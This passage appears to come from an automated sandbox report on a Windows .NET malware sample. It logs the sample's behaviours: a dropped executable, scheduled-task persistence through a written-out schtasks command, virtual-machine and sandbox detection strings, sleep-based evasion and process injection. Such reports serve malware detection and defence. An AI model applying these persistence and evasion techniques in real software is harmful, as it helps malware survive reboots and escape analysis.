                      Source: 0.2.SecuriteInfo.com.Win32.18332.exe.db0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.SecuriteInfo.com.Win32.18332.exe.db0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.SecuriteInfo.com.Win32.18332.exe.2d0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.2.SecuriteInfo.com.Win32.18332.exe.2d0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.2.SecuriteInfo.com.Win32.18332.exe.2e0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.SecuriteInfo.com.Win32.18332.exe.2e0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.SecuriteInfo.com.Win32.18332.exe.a40000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_0125B397 push edi; retn 0000h5_2_0125B399
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.52059218379
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.52059218379
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile created: C:\Users\user\AppData\Roaming\mwflisJj.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM_3Show sources
                      Source: Yara matchFile source: 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.18332.exe PID: 6660, type: MEMORY
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.32669a0.1.raw.unpack, type: UNPACKEDPE
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWindow / User API: threadDelayed 1058Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWindow / User API: threadDelayed 8792Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe TID: 6664Thread sleep time: -100806s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe TID: 6664Thread sleep time: -35000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe TID: 6696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe TID: 2504Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe TID: 4584Thread sleep count: 1058 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe TID: 4584Thread sleep count: 8792 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_0125F410 LdrInitializeThunk,5_2_0125F410
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp'Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeJump to behavior
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.505785434.0000000001870000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.505785434.0000000001870000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.505785434.0000000001870000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.505785434.0000000001870000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
